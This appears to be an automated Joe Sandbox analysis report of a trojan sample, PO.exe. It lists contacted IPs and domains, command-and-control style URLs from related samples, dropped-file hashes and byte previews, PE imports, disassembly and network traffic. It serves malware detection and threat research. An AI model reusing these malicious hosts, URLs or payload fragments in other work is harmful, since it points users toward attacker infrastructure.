http://www.fontbureau.com/designers? | | high
http://www.tiro.com | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers | | high
http://www.goodfont.co.kr | URL Reputation: safe (3 entries) | unknown
http://www.carterandcone.coml | URL Reputation: safe (3 entries) | unknown
http://www.sajatypeworks.com | URL Reputation: safe (3 entries) | unknown
http://www.typography.netD | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | | high
http://www.founder.com.cn/cn/cThe | URL Reputation: safe (3 entries) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | URL Reputation: safe (3 entries) | unknown
http://fontfabrik.com | URL Reputation: safe (3 entries) | unknown
http://www.founder.com.cn/cn | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers/frere-jones.html | | high
http://www.jiyu-kobo.co.jp/ | URL Reputation: safe (3 entries) | unknown
http://www.galapagosdesign.com/DPlease | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers8 | | high
http://www.fonts.com | | high
http://www.sandoll.co.kr | URL Reputation: safe (3 entries) | unknown
http://www.urwpp.deDPlease | URL Reputation: safe (3 entries) | unknown
http://www.zhongyicts.com.cn | URL Reputation: safe (3 entries) | unknown
http://www.sakkal.com | URL Reputation: safe (3 entries) | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
194.117.254.63 | www.websiteworlda-z.com | Germany | 199753 | UDMEDIA-ASDE | true
44.227.76.166 | pixie.porkbun.com | United States | 16509 | AMAZON-02US | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383905
Start date: 08.04.2021
Start time: 12:07:37
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 58s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PO.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@3/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 24.5% (good quality ratio 22.1%)
• Quality average: 74.4%
• Quality standard deviation: 31.5%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.193.48, 95.100.54.203, 104.43.139.144, 13.64.90.137
• Excluded domains from analysis (whitelisted): www.bing.com, skypedataprdcolwus17.cloudapp.net, cs9.wac.phicdn.net, fs.microsoft.com, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/383905/sample/PO.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      44.227.76.166comprobante de pago bancario.exeGet hashmaliciousBrowse
                                      • www.yogatrac.com/nyd/?YtuHyXfh=SMnWtEQ8y2pX2v0EcX/kTDaCTyMd/4ZOM8Yn20hDsleGVYNoHo8paRPAMQl4LEXOAbPhqadgrw==&EZXXgv=jfFxzRS8f
                                      DHL Shipping Documents.exeGet hashmaliciousBrowse
                                      • www.moxie.tools/iuem/?FPWh=qnqwh/4dGUkEPIiKKZC2Qh7/64Y57CPLqiaIJV/+rJe3odMWgDf37HnBEyhQfLRblvKe&a48=tXIxBt1HyrBHz
                                      Qag2QPPlqt.dllGet hashmaliciousBrowse
                                      • deregojikulo.uno/
                                      proposal.xlsmGet hashmaliciousBrowse
                                      • www.presetleb.com/c2m8/?Cp=mL3ph6&9rH8-46=B8KyvHV7cHq72Oa5QjcCq/2rFyb4yB/qHh31zSj+jHa+8ZyD95jL+K6sl8yH++EKbvdp
                                      ezr37taArt.exeGet hashmaliciousBrowse
                                      • www.miraterratravel.com/ea9e/?GV_T=kpyYxkk9Ceh68GTku2FXTga5fFtWFfAJreHIHrkcWtIc/mW0Yt08earvdHXP/oWhsQVrL3JPMw==&AnB=O2Mx8TLHW
                                      Soa.docGet hashmaliciousBrowse
                                      • www.jel-tv365.com/bf3/?ObUhgbrX=pPFC1+5LH0IKJOgFl43N69YXWFusdtxU8P9UDIzNNR9l6bY12tLu7UJOSlu1hZVFy9DQOw==&bxl8=Z488bf3h1DuDA8F
                                      SCAN_20210112_132640143,pdf.exeGet hashmaliciousBrowse
                                      • www.pizzony.com/rmck/?Bf=7fOJYc3SWWcK9ItFVlvmlups7o9AcKVpiUJzUCYg5a838kgteGFS+Jc7xrCS57SKg0rr&rv0PXN=hBZtPr80A0f
                                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtfGet hashmaliciousBrowse
                                      • www.buyleasenames.com/th9/?MbCdXj=rmVgIP7NLqu5IqLfwUaZy5YpunnORz1e2lJnxDx+qK6UmpGhFXMhTGrvGFqOmXv+78GrdA==&1bL0=nN6tXVY0-tVP_b
                                      inv.exeGet hashmaliciousBrowse
                                      • www.pompanodogtrainers.com/tabo/?uFQh=t2k4hn5TmbxwPjUurJswVrDNAFkjO32ahLMl0tqguGOf6hevZwPAKcE0/42AiwGFl7gy&CTvX=cvUhPfRP
                                      h3dFAROdF3.exeGet hashmaliciousBrowse
                                      • www.dog2meeting.com/jskg/?8pgD2lkp=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxtnR1X6Bv9&yTIDml=X6XHfZU8d
                                      d2mISAbTQN.exeGet hashmaliciousBrowse
                                      • www.dog2meeting.com/jskg/?Hr=V48HzvXX&v4=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49Odu7h5v3gSr//fqzw==
                                      n41pVXkYCe.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?8pJPDtoX=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctryp5FdPNoXwMPrDtw==&CvL0=inCTmHzH
                                      kqwqyoFz1C.exeGet hashmaliciousBrowse
                                      • www.dog2meeting.com/jskg/?9roHn=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxtnR1X6Bv9&npHhW=3fq4gDD0abs8
                                      BsR85tOyjL.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?V4=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctoeA6Fh3ELim&Uzu8J=Szrd3PcPWlV
                                      Z4bamJ91oo.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?inKP_TF0=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctr+Q1kxPauLh&oneha=xPMpsZU8
                                      zISJXAAewo.exeGet hashmaliciousBrowse
                                      • www.dog2meeting.com/jskg/?1bwHc=yVMpBJZhmT_xj43&Rl=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxH4hFX+Dn9
                                      zISJXAAewo.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?X2JtLRIH=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctoeql1R3AJqm&blv=UVIpcz0pIRTp
                                      uqAU5Vneod.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?afcTJPQ8=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctryp5FdPNoXwMPrDtw==&cxoT9=yhvp2Xfp
                                      P0_4859930058_NEW_0RDER.xlsxGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?oBN0yB=B6OS4EeIWk1Jsyxdn2yENkMcFrDOqbu3f1B3YoxAEyFagbjyCITSDbzeuNyW+VlEPI/WVw==&2dhH=XHE0vBK
                                      KWOgblwL7W.exeGet hashmaliciousBrowse
                                      • www.keebcat.com/d9s8/?J48Lz0S0=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd&ArR=YVcTxLcP

                                      Domains

                                      Match: pixie.porkbun.com
                                      Associated Sample Name / URL | Detection | Context
                                      PO4308.exe | malicious | 44.227.76.166
                                      pumYguna1i.exe | malicious | 44.227.76.166
                                      DYANAMIC Inquiry.xlsx | malicious | 44.227.76.166
                                      comprobante de pago bancario.exe | malicious | 44.227.76.166
                                      DHL Shipping Documents.exe | malicious | 44.227.76.166
                                      PDF NEW P.OJerhWEMSj4RnE4Z.exe | malicious | 44.227.65.245
                                      Proforma Invoice 2.xlsx | malicious | 44.227.65.245
                                      Transfer Form.exe | malicious | 44.227.65.245
                                      7Q5Er1TObp.exe | malicious | 44.227.65.245
                                      foHzqhWjvn.exe | malicious | 44.227.65.245
                                      27hKPHrVa3.exe | malicious | 44.227.65.245
                                      NEW ORDER QUOTATION.xlsx | malicious | 44.227.65.245
                                      NEW ORDER.xlsx | malicious | 44.227.65.245
                                      Invoice #0023228 PDF.exe | malicious | 44.227.65.245
                                      SWIFT.exe | malicious | 44.227.65.245
                                      proposal.xlsm | malicious | 44.227.76.166
                                      ezr37taArt.exe | malicious | 44.227.76.166
                                      Soa.doc | malicious | 44.227.76.166
                                      RFQ TK011821.doc | malicious | 44.227.65.245
                                      SCAN_20210112_132640143,pdf.exe | malicious | 44.227.76.166

                                      ASN

                                      Match: UDMEDIA-AS DE
                                      Associated Sample Name / URL | Detection | Context
                                      sample.exe | malicious | 194.117.254.45
                                      qZpkW36P5i.exe | malicious | 194.117.254.45
                                      Emotet.doc | malicious | 194.117.254.33

                                      Match: AMAZON-02 US
                                      Associated Sample Name / URL | Detection | Context
                                      invoice.exe | malicious | 35.156.117.131
                                      Calt7BoW2a.exe | malicious | 3.14.206.30
                                      0BAdCQQVtP.exe | malicious | 52.40.12.112
                                      TazxfJHRhq.exe | malicious | 52.216.152.43
                                      1wOdXavtlE.exe | malicious | 52.216.179.59
                                      hvEop8Y70Y.exe | malicious | 15.165.26.252
                                      8sxgohtHjM.exe | malicious | 3.13.255.157
                                      eQLPRPErea.exe | malicious | 13.248.216.40
                                      vbc.exe | malicious | 3.13.255.157
                                      o2KKHvtb3c.exe | malicious | 18.218.104.192
                                      Order Inquiry.exe | malicious | 3.14.206.30
                                      6IGbftBsBg.exe | malicious | 104.192.141.1
                                      nicoleta.fagaras-DHL_TRACKING_1394942.html | malicious | 52.218.213.96
                                      PaymentAdvice.exe | malicious | 3.14.206.30
                                      ikoAImKWvI.exe | malicious | 104.192.141.1
                                      BL01345678053567.exe | malicious | 3.14.206.30
                                      AL JUNEIDI LIST.xlsx | malicious | 65.0.168.152
                                      DYANAMIC Inquiry.xlsx | malicious | 65.0.168.152
                                      Statement of Account.xlsx | malicious | 15.165.26.252
                                      Shipping Documents.xlsx | malicious | 52.217.8.51

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\0c1xisnj7gzhsxz
                                      Process: C:\Users\user\Desktop\PO.exe
                                      File Type: data
                                      Category: dropped
                                      Size (bytes): 186368
                                      Entropy (8bit): 7.9990308732293505
                                      Encrypted: true
                                      SSDEEP: 3072:dxXjk0A3knDWFylq12Hk4MSxUt0SaGFUw8JIkV+6H3PoH/BIbrAIVxI:dNjU3kn46q2k43OFU2kV++wmb9VW
                                      MD5: 020124B82D8A5F3837DAE65C84839A13
                                      SHA1: E11D3587563B303BAE663D8B4F634D70E6FFF54A
                                      SHA-256: 49CA2A8DDC46ED5FDD3C8DFF58683CACD0C8445A6675E01E0E422BB5B8729659
                                      SHA-512: 864086161DD9A53B20A89933E4F73A082E829D5B944C784A4EB3BFC6CBF1E47E69AF2E8C0DC31BA28F479FB3AE54103BA013F821B05B0A6759BD3B100FC77873
                                      Malicious: false
                                      Reputation: low
                                      Preview: KUxm~...m......Z.$.Xd..@..N.....[y.=Hy*.....o...R.....X..z..:. .&.i...3q....,....JZ..gx...}.QQ........x..d.;'.....(~.. *.%.....<...#.%&....r....._U.8k.Uz..tZ...|r.../...{......v....-a].|...7.F.U..h.2...v.....H.uvM.d.p.1.Lc......:.....W.@..1gdTUs.C......{%...jrV.K1._..*.O.z...cM.R:.a.xj..RZ.d.[f_~m.*.hg[..F._..3~z...BA.S....y.ha,_rJ..8.c...?.EF..R.+...$b.....V.).'.{...L}....#...Q..........W..5.Xjxt..&.h.U..._...K]p)l..<P..f..9..oV`......... ./&.]|..L$.ck..PP.....3q../.W^...?......&.k$...R.b.....1Gd..A5.....@v...B.3..|<p.}.rB%...A*n..-.;..?v.bsH..b...F.t.T..(9-k.%+v...G.....+[R.......9.0.ud..0.Ib.o....o......9..W.....Ma.i..$x9..)).......l8..`./.<Ak....B*..L#.....Am......T.....I.Z..Y~y...Z.V..r......@.....$..L.1...hH&.G......\....?.4.p&.H..............wB.1..@..v..;.c.C<.$.j!'....k8CSD..J...2H=e..l6R..Z^..j...b....s...<.!j.O8......b`.L#:.H.....!.@.^.~.Z.@......r...}....P0M....]j...@..k..P.3...s.......N..k.W.[.......;.s8,.H.a....(.#Ln.r.x..tM6......
                                      C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll
                                      Process: C:\Users\user\Desktop\PO.exe
                                      File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category: dropped
                                      Size (bytes): 4096
                                      Entropy (8bit): 4.1361599484937495
                                      Encrypted: false
                                      SSDEEP: 48:vpgNQILdkQpZXsXvPviTLNuLebdsbriB4ZYmR:Bc+8pmvPvinktfiuZVR
                                      MD5: 7DA758941832369963F45B31B4BE74EB
                                      SHA1: 775719B94BF9E81CD4E2A99DC3ECB2DF61020129
                                      SHA-256: D68BF256D203EB2B6630F8D9D5FF63AE674ADB94D0BE58BDD2CE9E6C9269CA30
                                      SHA-512: 45EE9A16381067CC06D1954E41A17DE62E64B3AAF4A6E9307D8A9EBAAD4CB644D3F2C903EB0A61B75FB65E01D6B128525BAA9856BAFE766D5CE1A4B330FF0BF2
                                      Malicious: true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 10%
                                      Reputation: low
                                      Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L... ..............................................$"...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\yfmgdsfcotdgfk
                                      Process: C:\Users\user\Desktop\PO.exe
                                      File Type: data
                                      Category: dropped
                                      Size (bytes): 6661
                                      Entropy (8bit): 7.9543287169682415
                                      Encrypted: false
                                      SSDEEP: 192:A4CaC0frJWuNQpQc4H9aEmBkcXntsB5DaCW:APazDJspX4GmikW
                                      MD5: 25891C3E29F2C303C026F8716C29F1BE
                                      SHA1: D1A289B1CB960EB9987DB9488D76D9C5553CCBBB
                                      SHA-256: A6DFD0BD1725F7B948ED304A77F403345C750E9A41E1F8526CD509D192E6FD76
                                      SHA-512: 339FD62334C78DC483F370AE5521CFA1BA757647D67D02BCE80CAD8914E84B3CDC9E798A72BE2DA24D4157AD2ADD7D5F5481D850B0E123C644F5711232F233D9
                                      Malicious: false
                                      Reputation: low
                                      Preview: .....#....O.... z.(>...q|...k.......y*.fb...:...v9..().yZ....>Z.P..k..3.5=U....2.z..gK...n=.......H.q.........~.,ny..o.....4t.-5..JA..2K.c.8...S.9Z.}u....[....,....z&..k ...8..4.i.{B...GX...0+|U=.eA.C..:...e.$?V_.!.9.....a..pX..@...aB9d....O..!{o....[K.}.....%.Z1.0.....F.....c..I.R..:|(M....U.*4.z.2..........c..0[.M.....J..[z..v.{.q..../#G6.4P..d.5.q.>@.....t/P.n.7.e.0.....l..x...u...*.r.#.,.|G.u.y..4&.4P%.'HJ2c....Y....P.^.O.x.@N..a.e....:..<..mE..f...B..6.!.9.+K......a....^..J.&d.m<...7.Xp.X...)..(...BzZ....mI.......b...........-.X)....4j.E....W7........tC... ......0.fi...j..f].N....LZ.v..0........FL.d.&.t.Y...?..Xtg...T.l.!OE.~.A|y..2O.wX.....z ji*Bq..%82...z>d}<\.`<e..G.g..-.JC..:..;".B[;y....S2y..v.....7..R..J....E......v..wg..4,.X......u...b./.G.....t{.e...>q=?.....~Z_..........'../.O......XM...4.{...0.)........nB.!._.)..Z@.....B...G1o6l.a...t.ON...u.F.M....d-..Z.E......7...r..Hj2z&?......,J...P..kmr%...e..}..U`.....mNY.._.&9..y..Ih.A.l8.

                                      Static File Info

                                      General

                                      File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit): 7.917905190852182
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name: PO.exe
                                      File size: 228037
                                      MD5: 665cb19601850467af3ee7d9fd0e0350
                                      SHA1: 8ac40ef9fa5100a39b14258d8d8e562cefd7202c
                                      SHA256: f3147300f9248e07ffd3a1b7131bed4febad8b0a88eeda27e606f36d04ff1340
                                      SHA512: 106e612d3a8aa36034cb534c87930b4013fcad08d338e7224b0245b305f963a28975e2f36f84a9b48f2d517e6c98285c24146adb9c2ebac9088fc3f379a0ef7b
                                      SSDEEP: 3072:HyewmN4skJ6/rfxXjk0A3knDWFylq12Hk4MSxUt0SaGFUw8JIkV+6H3PoH/BIbrN:Hd7bNjU3kn46q2k43OFU2kV++wmb9V5
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                      File Icon

                                      Icon Hash: b2a88c96b2ca6a72

                                      Static PE Info

                                      General

                                      Entrypoint: 0x40314a
                                      Entrypoint Section: .text
                                      Digitally signed: false
                                      Imagebase: 0x400000
                                      Subsystem: windows gui
                                      Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:
                                      Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major: 4
                                      OS Version Minor: 0
                                      File Version Major: 4
                                      File Version Minor: 0
                                      Subsystem Version Major: 4
                                      Subsystem Version Minor: 0
                                      Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 0000017Ch
                                      push ebx
                                      push ebp
                                      push esi
                                      xor esi, esi
                                      push edi
                                      mov dword ptr [esp+18h], esi
                                      mov ebp, 00409240h
                                      mov byte ptr [esp+10h], 00000020h
                                      call dword ptr [00407030h]
                                      push esi
                                      call dword ptr [00407270h]
                                      mov dword ptr [007A3030h], eax
                                      push esi
                                      lea eax, dword ptr [esp+30h]
                                      push 00000160h
                                      push eax
                                      push esi
                                      push 0079E540h
                                      call dword ptr [00407158h]
                                      push 00409230h
                                      push 007A2780h
                                      call 00007F2258D7E2A8h
                                      mov ebx, 007AA400h
                                      push ebx
                                      push 00000400h
                                      call dword ptr [004070B4h]
                                      call 00007F2258D7B9E9h
                                      test eax, eax
                                      jne 00007F2258D7BAA6h
                                      push 000003FBh
                                      push ebx
                                      call dword ptr [004070B0h]
                                      push 00409228h
                                      push ebx
                                      call 00007F2258D7E293h
                                      call 00007F2258D7B9C9h
                                      test eax, eax
                                      je 00007F2258D7BBC2h
                                      mov edi, 007A9000h
                                      push edi
                                      call dword ptr [00407140h]
                                      call dword ptr [004070ACh]
                                      push eax
                                      push edi
                                      call 00007F2258D7E251h
                                      push 00000000h
                                      call dword ptr [00407108h]
                                      cmp byte ptr [007A9000h], 00000022h
                                      mov dword ptr [007A2F80h], eax
                                      mov eax, edi
                                      jne 00007F2258D7BA8Ch
                                      mov byte ptr [esp+10h], 00000022h
                                      mov eax, 00000001h

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0

                                      Sections

                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name | RVA | Size | Type | Language | Country
                                      RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
                                      RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
                                      RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
                                      RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
                                      RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
                                      RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                      Imports

                                      DLL | Import
                                      KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                      USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                      GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                      SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                      ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                      COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                      VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                      Possible Origin

                                      Language of compilation system | Country where language is spoken
                                      English | United States

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Apr 8, 2021 12:10:12.314201117 CEST | 49693 | 80 | 192.168.2.5 | 194.117.254.63
                                      Apr 8, 2021 12:10:12.331975937 CEST | 80 | 49693 | 194.117.254.63 | 192.168.2.5
                                      Apr 8, 2021 12:10:12.333208084 CEST | 49693 | 80 | 192.168.2.5 | 194.117.254.63
                                      Apr 8, 2021 12:10:12.333529949 CEST | 49693 | 80 | 192.168.2.5 | 194.117.254.63
                                      Apr 8, 2021 12:10:12.350931883 CEST | 80 | 49693 | 194.117.254.63 | 192.168.2.5
                                      Apr 8, 2021 12:10:12.351783037 CEST | 80 | 49693 | 194.117.254.63 | 192.168.2.5
                                      Apr 8, 2021 12:10:12.351804018 CEST | 80 | 49693 | 194.117.254.63 | 192.168.2.5
                                      Apr 8, 2021 12:10:12.353475094 CEST | 49693 | 80 | 192.168.2.5 | 194.117.254.63
                                      Apr 8, 2021 12:10:12.353513956 CEST | 49693 | 80 | 192.168.2.5 | 194.117.254.63
                                      Apr 8, 2021 12:10:12.371041059 CEST | 80 | 49693 | 194.117.254.63 | 192.168.2.5
                                      Apr 8, 2021 12:10:32.768593073 CEST | 49694 | 80 | 192.168.2.5 | 44.227.76.166
                                      Apr 8, 2021 12:10:32.934870958 CEST | 80 | 49694 | 44.227.76.166 | 192.168.2.5
                                      Apr 8, 2021 12:10:32.934983015 CEST | 49694 | 80 | 192.168.2.5 | 44.227.76.166
                                      Apr 8, 2021 12:10:33.100056887 CEST | 80 | 49694 | 44.227.76.166 | 192.168.2.5
                                      Apr 8, 2021 12:10:33.100172997 CEST | 49694 | 80 | 192.168.2.5 | 44.227.76.166
                                      Apr 8, 2021 12:10:33.265103102 CEST | 80 | 49694 | 44.227.76.166 | 192.168.2.5
                                      Apr 8, 2021 12:10:33.269149065 CEST | 80 | 49694 | 44.227.76.166 | 192.168.2.5
                                      Apr 8, 2021 12:10:33.269192934 CEST | 80 | 49694 | 44.227.76.166 | 192.168.2.5
                                      Apr 8, 2021 12:10:33.269349098 CEST | 49694 | 80 | 192.168.2.5 | 44.227.76.166
